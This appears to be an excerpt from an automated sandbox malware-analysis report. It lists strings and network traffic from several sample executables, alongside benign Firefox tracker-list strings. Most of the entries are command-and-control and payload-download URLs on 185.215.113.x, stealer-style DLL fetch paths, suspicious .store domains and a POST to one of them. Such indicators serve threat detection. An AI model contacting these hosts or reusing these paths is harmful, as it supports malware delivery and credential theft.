                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {incognito:null, tabId:null, types:["image"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {incognito:null, tabId:null, types:["imageset"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pixel.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId:
                          Source: firefox.exe, 00000020.00000002.3003403643.00000253E883A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {incognito:null, tabId:null, types:["script"], urls:["*://webcompat-addon-testbed.herokuapp.com/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_2.js", "*://example.com/browser/browser/extensions/webcompat/tests/browser/shims_test_3.js", "*://s7.addthis.com/icons/official-addthis-angularjs/current/dist/official-addthis-angularjs.min.js*", "*://track.adform.net/serving/scripts/trackpoint/", "*://track.adform.net/serving/scripts/trackpoint/async/", "*://*.adnxs.com/*/ast.js*", "*://*.adnxs.com/*/pb.js*", "*://*.adnxs.com/*/prebid*", "*://www.everestjs.net/static/st.v3.js*", "*://static.adsafeprotected.com/vans-adapter-google-ima.js", "*://pagead2.googlesyndication.com/pagead/js/adsbygoogle.js", "*://cdn.branch.io/branch-latest.min.js*", "*://pub.doubleverify.com/signals/pub.js*", "*://c.amazon-adsystem.com/aax2/apstag.js", "*://auth.9c9media.ca/auth/main.js", "*://static.chartbeat.com/js/chartbeat.js", "*://static.chartbeat.com/js/chartbeat_video.js", "*://static.criteo.net/js/ld/publishertag.js", "*://*.imgur.com/js/vendor.*.bundle.js", "*://*.imgur.io/js/vendor.*.bundle.js", "*://www.rva311.com/static/js/main.*.chunk.js", "*://web-assets.toggl.com/app/assets/scripts/*.js", "*://libs.coremetrics.com/eluminate.js", "*://connect.facebook.net/*/sdk.js*", "*://connect.facebook.net/*/all.js*", "*://secure.cdn.fastclick.net/js/cnvr-launcher/*/launcher-stub.min.js*", "*://www.google-analytics.com/analytics.js*", "*://www.google-analytics.com/gtm/js*", "*://www.googletagmanager.com/gtm.js*", "*://www.google-analytics.com/plugins/ua/ec.js", "*://ssl.google-analytics.com/ga.js", "*://s0.2mdn.net/instream/html5/ima3.js", "*://imasdk.googleapis.com/js/sdkloader/ima3.js", "*://www.googleadservices.com/pagead/conversion_async.js", "*://www.googletagservices.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/tag/js/gpt.js*", "*://pagead2.googlesyndication.com/gpt/pubads_impl_*.js*", "*://securepubads.g.doubleclick.net/tag/js/gpt.js*", "*://securepubads.g.doubleclick.net/gpt/pubads_impl_*.js*", "*://script.ioam.de/iam.js", "*://cdn.adsafeprotected.com/iasPET.1.js", "*://static.adsafeprotected.com/iasPET.1.js", "*://adservex.media.net/videoAds.js*", "*://*.moatads.com/*/moatad.js*", "*://*.moatads.com/*/moatapi.js*", "*://*.moatads.com/*/moatheader.js*", "*://*.moatads.com/*/yi.js*", "*://*.imrworldwide.com/v60.js", "*://cdn.optimizely.com/js/*.js", "*://cdn.optimizely.com/public/*.js", "*://id.rambler.ru/rambler-id-helper/auth_events.js", "*://media.richrelevance.com/rrserver/js/1.2/p13n.js", "*://www.gstatic.com/firebasejs/*/firebase-messaging.js*", "*://*.vidible.tv/*/vidible-min.js*", "*://vdb-cdn-files.s3.amazonaws.com/*/vidible-min.js*", "*://js.maxmind.com/js/apis/geoip2/*/geoip2.js", "*://s.webtrends.com/js/advancedLinkTracking.js", "*://s.webtrends.com/js/webtrends.js", "*://s.webtrends.com/js/webtrends.min.js"], windowId:
                          Source: firefox.exe, 00000020.00000002.3322305671.00000253EDF0B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: {incognito:null, tabId:null, types:["xmlhttprequest"], urls:["*://track.adform.net/Serving/TrackPoint/*", "*://pagead2.googlesyndication.com/pagead/*.js*fcd=true", "*://pagead2.googlesyndication.com/pagead/js/*.js*fcd=true", "*://pixel.advertising.com/firefox-etp", "*://cdn.cmp.advertising.com/firefox-etp", "*://*.advertising.com/*.js*", "*://*.advertising.com/*", "*://securepubads.g.doubleclick.net/gampad/*ad-blk*", "*://pubads.g.doubleclick.net/gampad/*ad-blk*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap1*", "*://vast.adsafeprotected.com/vast*", "*://securepubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://pubads.g.doubleclick.net/gampad/*xml_vmap2*", "*://securepubads.g.doubleclick.net/gampad/*ad*", "*://pubads.g.doubleclick.net/gampad/*ad*", "*://www.facebook.com/platform/impression.php*", "https://ads.stickyadstv.com/firefox-etp", "*://ads.stickyadstv.com/auto-user-sync*", "*://ads.stickyadstv.com/user-matching*", "https://static.adsafeprotected.com/firefox-etp-pixel", "https://static.adsafeprotected.com/firefox-etp-js", "*://*.adsafeprotected.com/*.gif*", "*://*.adsafeprotected.com/*.png*", "*://*.adsafeprotected.com/*.js*", "*://*.adsafeprotected.com/*/adj*", "*://*.adsafeprotected.com/*/imp/*", "*://*.adsafeprotected.com/*/Serving/*", "*://*.adsafeprotected.com/*/unit/*", "*://*.adsafeprotected.com/jload", "*://*.adsafeprotected.com/jload?*", "*://*.adsafeprotected.com/jsvid", "*://*.adsafeprotected.com/jsvid?*", "*://*.adsafeprotected.com/mon*", "*://*.adsafeprotected.com/tpl", "*://*.adsafeprotected.com/tpl?*", "*://*.adsafeprotected.com/services/pub*", "*://*.adsafeprotected.com/*"], windowId:null} equals www.facebook.com (Facebook)
                          Source: global trafficDNS traffic detected: DNS query: 171.39.242.20.in-addr.arpa
                          Source: global trafficDNS traffic detected: DNS query: wasni.care
                          Source: global trafficDNS traffic detected: DNS query: presticitpo.store
                          Source: global trafficDNS traffic detected: DNS query: crisiwarny.store
                          Source: global trafficDNS traffic detected: DNS query: fadehairucw.store
                          Source: global trafficDNS traffic detected: DNS query: thumbystriw.store
                          Source: global trafficDNS traffic detected: DNS query: necklacedmny.store
                          Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
                          Source: global trafficDNS traffic detected: DNS query: youtube.com
                          Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: contile.services.mozilla.com
                          Source: global trafficDNS traffic detected: DNS query: spocs.getpocket.com
                          Source: global trafficDNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
                          Source: global trafficDNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
                          Source: global trafficDNS traffic detected: DNS query: www.google.com
                          Source: global trafficDNS traffic detected: DNS query: example.org
                          Source: global trafficDNS traffic detected: DNS query: ipv4only.arpa
                          Source: global trafficDNS traffic detected: DNS query: shavar.services.mozilla.com
                          Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
                          Source: firefox.exe, 00000020.00000002.2956394320.00000253DC76B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000020.00000003.2896697038.00000253F03A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://127.0.0.1:
                          Source: 24da741fb6.exe, 0000000B.00000003.2799995147.00000000011B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/luma/random.exe
                          Source: 24da741fb6.exe, 0000000B.00000003.2799995147.00000000011B6000.00000004.00000020.00020000.00000000.sdmp, 24da741fb6.exe, 0000000B.00000003.2800223657.0000000001171000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exe
                          Source: 24da741fb6.exe, 0000000B.00000003.2799995147.00000000011B6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/def.exeU
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exe
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/off/random.exe203f60e481.exe
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/steam/random.exe
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16/well/random.exe
                          Source: 24da741fb6.exe, 0000000B.00000003.2800223657.0000000001140000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.16:80/off/def.exe
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.00000000006F6000.00000040.00000001.01000000.0000000D.sdmp, 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2922718430.00000000006F6000.00000040.00000001.01000000.0000000D.sdmp, 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php)
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php2o
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.php9
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpBQ
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.0000000000724000.00000040.00000001.01000000.0000000D.sdmp, 0d8313073f.exe, 0000000D.00000002.2922718430.00000000006F6000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpUser
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpZoq
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpc
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpe
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpinit.exe
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpion:
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.0000000000724000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/6c4adf523b719729.phpser
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/f54b7a7b09c68fae5469ce8eed82f89tension
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001693000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dll
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dll&Mv
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dll68fae5469ce8eed82f89tension
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dllDatavbnData
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dllRNB
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dlla
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dlladf523b719729.php
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/freebl3.dllnM
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/ge
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/hpe
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/hper
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001693000.00000004.00000020.00020000.00000000.sdmp, 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/mozglue.dll
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/mozglue.dll68fae5469ce8eed82f89l
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/mozglue.dllNN
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/mozglue.dlla
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/mozglue.dllaBrowserMetrics
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/mozglue.dlldN
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/mozglue.dllvN
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/msvcp140.dll
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/msvcp140.dll-
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.00000000006F6000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/msvcp140.dll8fae5469ce8eed82f89CookiesCookies4170464094982
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001693000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/msvcp140.dllR
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/msvcp140.dll_s.
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/msvcp140.dllas
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/msvcp140.dlldf523b719729.php
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/nss3.dll
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/nss3.dllData
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/nss3.dllata
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/owser
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/softokn3.dll
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.0000000000724000.00000040.00000001.01000000.0000000D.sdmp, 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001632000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/sqlite3.dll
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/vcruntime140.dll
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/vcruntime140.dllvbnData
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/ware
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206/746f34465cf17784/wareer
                          Source: 0d8313073f.exe, 0000000D.00000002.2940306745.0000000001615000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.206/aqH
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.2066c4adf523b719729.phper
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206746f34465cf17784/sqlite3.dllm-data;
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206Local
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206Roaming
                          Source: 0d8313073f.exe, 0000000D.00000002.2922718430.000000000087E000.00000040.00000001.01000000.0000000D.sdmpString found in binary or memory: http://185.215.113.206e9266f1adc12494f77f54b7a7b09c68fae5469ce8eed82f89
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmp, skotes.exe, 00000006.00000002.2934737174.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php2
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php3346001
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php95d7
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpG
                          Source: skotes.exe, 00000006.00000002.2934737174.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpM
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpcoded
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedc
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncodedh
                          Source: skotes.exe, 00000006.00000002.2934737174.0000000001594000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpq
                          Source: skotes.exe, 00000006.00000002.2934737174.00000000015A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpy1mb3JtLXVybGVuY29kZWQ=mpp
